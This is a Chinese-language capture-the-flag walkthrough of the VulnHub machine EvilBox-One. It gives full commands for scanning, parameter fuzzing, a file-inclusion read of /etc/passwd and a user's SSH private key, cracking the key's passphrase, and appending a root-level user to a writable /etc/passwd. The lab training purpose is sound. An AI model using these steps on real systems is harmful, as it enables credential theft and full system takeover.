EvilBox-One靶机渗透
字数 1086 2025-08-12 12:08:15
EvilBox-One 靶机渗透教学文档
1. 靶机概述
- 下载地址: VulnHub EvilBox-One
- 难度: 简单
- 推荐环境: VirtualBox (比VMware兼容性更好)
- 靶机IP: 10.8.1.119 (实际环境中可能不同)
2. 信息收集
2.1 端口扫描
使用nmap进行端口扫描:
nmap -sV -p- 10.8.1.119
发现开放端口:
- 22 (SSH)
- 25 (SMTP)
- 80 (HTTP)
- 110 (POP3)
2.2 目录扫描
-
检查
/robots.txt发现提示:- Hello
- H4x0r
(这些信息后续可能有用)
-
访问
/secret目录显示空白页面 -
使用gobuster进行目录扫描:
gobuster dir -u http://10.8.1.119/secret -w /usr/share/wordlists/dirb/common.txt发现
evil.php文件
3. 漏洞利用
3.1 参数爆破
-
访问
/secret/evil.php显示空白页面,推测需要参数 -
使用wfuzz进行参数爆破:
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 0 "http://10.8.1.119/secret/evil.php?FUZZ=/etc/passwd"发现有效参数
command -
测试文件包含漏洞:
http://10.8.1.119/secret/evil.php?command=/etc/passwd成功读取
/etc/passwd,发现用户mowree
3.2 SSH私钥获取与破解
-
通过文件包含漏洞读取用户私钥:
http://10.8.1.119/secret/evil.php?command=/home/mowree/.ssh/id_rsa -
保存私钥为
id_rsa并设置权限:chmod 600 id_rsa -
使用ssh2john转换私钥:
ssh2john id_rsa > pass.txt -
使用john破解密码:
john --wordlist=/usr/share/wordlists/rockyou.txt pass.txt得到密码
unicorn -
使用私钥登录SSH:
ssh -i id_rsa mowree@10.8.1.119输入密码
unicorn成功获取shell -
查看用户flag:
cat user.txt
4. 权限提升
4.1 检查/etc/passwd权限
- 检查
/etc/passwd文件权限:
发现可写权限ls -l /etc/passwd
4.2 添加特权用户
-
生成加密密码:
perl -le 'print crypt("test","test")'输出:
teH0wLIpW0gyQ -
添加root权限用户:
echo "toor:teH0wLIpW0gyQ:0:0:root:/root:/bin/bash" >> /etc/passwd -
验证添加:
cat /etc/passwd | grep toor -
切换用户:
su toor输入密码
test获取root权限 -
查看root flag:
cat /root/root.txt得到flag:
36QtXfdJWvdC0VavlPIApUbDlqTsBM!
5. 总结与经验
-
常见提权方法检查顺序:
sudo -l检查sudo权限- 检查
.bash_history历史命令 - 检查
/etc/passwd权限 - 检查系统版本信息
- 查找隐藏文件和目录
-
文件包含漏洞利用:
- 尝试读取常见敏感文件(/etc/passwd, /etc/shadow, 用户目录文件等)
- 注意参数爆破的重要性
-
SSH私钥利用:
- 私钥权限必须为600
- 使用ssh2john和john工具组合破解
-
密码生成技巧:
- 使用perl的crypt函数生成加密密码
- 格式:
perl -le 'print crypt("密码","盐值")'
-
靶机渗透流程:
信息收集 → 漏洞发现 → 初始访问 → 权限提升 → 获取flag